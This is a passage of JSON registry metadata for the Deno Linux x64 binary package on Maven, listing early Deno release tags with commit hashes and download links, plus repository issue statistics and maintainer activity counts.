null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:50:24.755Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.530816956159015,"dependent_packages_count":45.07863008755334,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":38.304723521856175},"purl":"pkg:maven/org.mvnpm.at.deno/linux-x64-glibc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:linux-x64-glibc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:linux-x64-glibc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:linux-x64-glibc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:linux-x64-glibc/codemeta","maintainers":[],"registry":{"name":"repo1